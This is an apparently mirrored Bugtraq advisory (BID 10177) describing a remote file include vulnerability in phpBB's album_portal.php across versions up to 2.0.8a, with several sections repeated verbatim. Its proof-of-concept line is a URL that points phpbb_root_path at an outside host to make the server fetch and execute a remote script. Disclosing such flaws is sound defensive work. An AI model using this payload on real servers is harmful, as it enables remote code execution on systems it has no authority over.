PHPBB album_portal.php Remote File Include Vulnerability
BID:10177
Info
PHPBB album_portal.php Remote File Include Vulnerability
| Bugtraq ID: | 10177 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 19 2004 12:00AM |
| Updated: | Apr 19 2004 12:00AM |
| Credit: | Discovery is credited to Dariusz 'Officerrr' Kolasinski <[email protected]>. |
| Vulnerable: |
phpBB Group phpBB 2.0.8 a phpBB Group phpBB 2.0.8 phpBB Group phpBB 2.0.7 a phpBB Group phpBB 2.0.7 phpBB Group phpBB 2.0.6 d phpBB Group phpBB 2.0.6 c phpBB Group phpBB 2.0.6 phpBB Group phpBB 2.0.5 phpBB Group phpBB 2.0.4 phpBB Group phpBB 2.0.3 phpBB Group phpBB 2.0.2 phpBB Group phpBB 2.0.1 phpBB Group phpBB 2.0 .0 phpBB Group phpBB 2.0 RC4 phpBB Group phpBB 2.0 RC3 phpBB Group phpBB 2.0 RC2 phpBB Group phpBB 2.0 RC1 phpBB Group phpBB 2.0 Beta 1 |
| Not Vulnerable: | |
Discussion
PHPBB album_portal.php Remote File Include Vulnerability
It has been reported that phpBB may be prone to a file include vulnerability that may allow remote attackers to include a remote malicious script to be executed on a vulnerable system.
It has been reported that phpBB may be prone to a file include vulnerability that may allow remote attackers to include a remote malicious script to be executed on a vulnerable system.
Exploit / POC
PHPBB album_portal.php Remote File Include Vulnerability
No exploit is required.
The following proof of concept has been supplied:
http://www.example.com/album_portal.php?phpbb_root_path=http://www.example.com/&phpEx=/../../[example.php]
No exploit is required.
The following proof of concept has been supplied:
http://www.example.com/album_portal.php?phpbb_root_path=http://www.example.com/&phpEx=/../../[example.php]
Solution / Fix
PHPBB album_portal.php Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
PHPBB album_portal.php Remote File Include Vulnerability
References:
References:
- phpBB Homepage (phpBB)
- phpBB modified by Przemo arbitary code execution (Dariusz 'Officerrr' Kolasinski
)